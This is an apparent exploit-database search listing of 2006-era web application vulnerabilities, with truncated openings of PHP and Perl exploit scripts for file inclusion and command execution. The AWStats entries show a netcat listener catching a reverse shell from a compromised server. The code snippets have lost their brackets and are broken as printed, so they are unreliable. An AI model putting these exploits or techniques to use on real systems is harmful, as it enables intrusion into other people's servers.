1763 matches found
PHP-Proxima 6.0 - 'BB_Smilies.php' Local File Inclusion
source: https://www.securityfocus.com/bid/19840/info PHP-Proxima is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability to retrieve arbitrary local files from the vulnerable system in the context of the...
iziContents-php.txt
!/usr/bin/php -q -d shortopentag=on include/rssfunctions.php line 32-40: .... $GLOBALS"rootdp" = './'; requireonce $GLOBALS"rootdp"."include/config.php"; requireonce $GLOBALS"rootdp"."include/db.php"; requireonce $GLOBALS"rootdp"."include/session.php"; includeonce...
Phorum 5 - pm.php Arbitrary Local Inclusion
!/usr/bin/php -q -d shortopentag=on 126 $result.=" ."; else $result.=" ".$string$i; if strlendechexord$string$i==2 $exa.=" ".dechexord$string$i; else $exa.=" 0".dechexord$string$i; $cont++;if $cont==15 $cont=0; $result.="\r\n"; $exa.="\r\n"; retu...
EJ3 TOPo 2.2 (descripcion) Remote Command Execution Exploit
No description provided by source. !/usr/bin/perl EJ3 TOPO 2.2 Remote Code Execution Exploit --------------------------------------------- Note : This Exploit Just run TOPO 2.2 IHST : www.Hackerz.Ir AST : www.aria-security.net Coded & Discovered By Hessam-x use LWP::UserAgent; use LWP::Simple; us...
MyBulletinBoard (MyBB) < 1.1.3 Remote Code Execution Exploit
No description provided by source. !/usr/bin/perl Tue Jun 13 12:37:12 CEST 2006 [email protected] Exploit HOWTO - read this before flood my Inbox you bitch! - First you need to create the special user to do this use: ./mybibi.pl --host=http://www.example.com --dir=/mybb -1 this step needs a graph...
SpamAssassin spamd vpopmail user vulnerability
Added: 06/09/2006 CVE: CVE-2006-2447 BID: 18290 OSVDB: 26177 Background SpamAssassin identifies spam e-mail using a variety of local and network based tests. spamd is a component of SpamAssassin which allows it to run as a network daemon. Problem When the vpopmail -v and paranoid -P options are...
DotClear 1.2.4 - prepend.php Remote File Inclusion
!/usr/bin/php -q -d shortopentag=on ? echo "DotClear = 1.2.4 prepend.php/'blogdcpath' arbitrary remote inclusion\r\n"; echo "by rgod [email protected]\r\n"; echo "site: http://retrogod.altervista.org\r\n\r\n"; echo "dork: "propulsé par DotClear"...
Update Protection against AWStats "migrate" Shell Command Injection
AWStats is an open source web analytics reporting tool, suitable for analyzing data from internet services. A vulnerability has been identified in AWStats due to improper validation of user input. The vulnerability may be exploited by attackers to execute arbitrary commands. July 5, 2006 On July 5...
NucleusCMS.txt
!/usr/bin/php -q -d shortopentag=on ...
Drupal <= 4.7 (attachment mod_mime) Remote Exploit
No description provided by source. !/usr/bin/php -q -d shortopentag=on ? echo "Drupal = 4.7 attachment modmime poc exploit\r\n"; echo "by rgod [email protected]\r\n"; echo "site: http://retrogod.altervista.org\r\n\r\n"; / this works with a user account with upload rights and with permissions to...
Nucleus CMS <= 3.22 (DIR_LIBS) Arbitrary Remote Inclusion Exploit
Exploit for unknown platform in category web applications ================================================================= Nucleus CMS = 3.22 DIRLIBS Arbitrary Remote Inclusion Exploit ================================================================= !/usr/bin/php -q -d shortopentag=on ? echo...
sugarsuite.txt
!/usr/bin/php -q -d shortopentag=on \r\n"; die; / software site: http://www.sugarcrm.com/crm/ i vulnerable code in modules/OptimisticLock/LockResolve.php...
DeluxeBB 1.06 - 'Attachment mod_mime' Remote Command Execution
!/usr/bin/php -q -d shortopentag=on ? echo "DeluxeBB = v1.06 attachment modmime exploit\r\n"; echo "by rgod [email protected]\r\n"; echo "site: http://retrogod.altervista.org\r\n"; echo "tested & working against a fresh deluxebb installation\r\n\r\n"; if $argc4 echo "Usage: php ".$argv0." host...
Sugar Suite Open Source <= 4.2 "OptimisticLock!" arbitrary remote inclusion exploit
!/usr/bin/php -q -d shortopentag=on ? echo "Sugar Suite Open Source = 4.2 "OptimisticLock!" arbitrary remote inclusion exploitrn"; echo "by rgod [email protected]"; echo "site: http://retrogod.altervista.orgrnrn"; echo "this is called the "five claws of Sun-tzu"rnrn"; if $argc5 echo "Usage: ph...
FreeBSD : libgadu -- multiple vulnerabilities (3b4a6982-0b24-11da-bc08-0001020eed82)
Wojtek Kaniewski reports : Multiple vulnerabilities have been found in libgadu, a library for handling Gadu-Gadu instant messaging protocol. It is a part of ekg, a Gadu-Gadu client, but is widely used in other clients. Also some of the user contributed scripts were found to behave in an insecure...
FreeBSD : firefox & mozilla -- command line URL shell command injection (2e28cefb-2aee-11da-a263-0001020eed82)
A Secunia Advisory reports : Peter Zelezny has discovered a vulnerability in Firefox, which can be exploited by malicious people to compromise a user's system. The vulnerability is caused due to the shell script used to launch Firefox parsing shell commands that are enclosed within backticks in t...
FreeBSD : opera -- command line URL shell command injection (dfc1daa8-61de-11da-b64c-0001020eed82)
An Opera Advisory reports : Opera for UNIX uses a wrapper shell script to start up Opera. This shell script reads the input arguments, like the file names or URLs that Opera is to open. It also performs some environment checks, for example whether Java is available and if so, where it is located...
phpRaid-1.txt
Kurdish Security Advisory phpRaid Remote File Include PHPBB : "Sosyalizim'de ısrar insan olmakta ısrardır" Abdullah Ocalan Contact : irc.gigachat.net kurdhack & www.PatrioticHackers.com & [email protected] Script : phpRaid Script Website : http://www.spiffyjr.com/ Version : phpRaid v2.9.5 "...
AWStats 6.5 - 'migrate' Remote Shell Command Injection
!/usr/bin/env python http://secunia.com/advisories/19969/ by [email protected] May 5, 2006 - HAPPY CINCO DE MAYO HAPPY BIRTHDAY DAD private plz redsand@jinxy / $ nc -l -p 31337 -v listening on any 31337 ... connect to 65.99.197.147 from blacksecurity.org 65.99.197.147 53377 id uid=81apach...
AWStats 6.5 - migrate Remote Shell Command Injection
!/usr/bin/env python http://secunia.com/advisories/19969/ by [email protected] May 5, 2006 - HAPPY CINCO DE MAYO HAPPY BIRTHDAY DAD private plz redsand@jinxy / $ nc -l -p 31337 -v listening on any 31337 ... connect to 65.99.197.147 from...